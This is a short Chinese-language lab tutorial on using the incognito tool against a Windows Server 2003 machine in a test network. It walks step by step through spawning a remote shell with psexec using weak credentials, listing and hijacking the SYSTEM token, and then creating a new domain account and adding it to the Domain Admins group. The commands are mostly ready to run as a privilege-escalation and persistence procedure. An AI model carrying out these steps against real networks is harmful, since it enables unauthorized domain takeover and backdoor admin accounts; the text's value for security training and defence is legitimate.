incognito是在kali上可以使用来进行提权的,主要的作用是用于进行提权的或者用来劫持身份的.如果需要进行这些操作,前提是需要开启smb服务,也就是445端口才可以,可以使用一些工具进行爆破smb的账号和密码.
- 以下实验用到的是一台03的服务器和一台win7的攻击机.
- 03的ip地址为:192.168.0.212,账号为1,密码也是1
- win7的ip地址为:192.168.0.207
1.使用psexec软件进行远程调用03cmd的cmd.
win7执行以下命令:psexec.exe \192.168.0.212 -u 1 -p 1 cmd
2.使用普通用户进行劫持域管理的身份.前提是03必须是加入域中,并且03是存在abc\administrator的用户身份进程.也就是曾经使用过03登录域服务器的.从而进行劫持身份,然后创建一个新的域管理员进行其他的操作.
1.incognito.exe -h 192.168.0.212 -u 1 -p 1 list_tokens -u #查找03的可用身份进行劫持
2.incognito.exe -h 192.168.0.212 -u 1 -p 1 execute -c "NT AUTHORITY\SYSTEM" cmd.exe #劫持system身份
3.然后使用cmd命令进行创建一个域控出来,因为这个域控的身份是有可能失效的.
net user 1 1 /domain /add #创建域账号
net group "domain admins" 1 /domain /add #添加到域控组中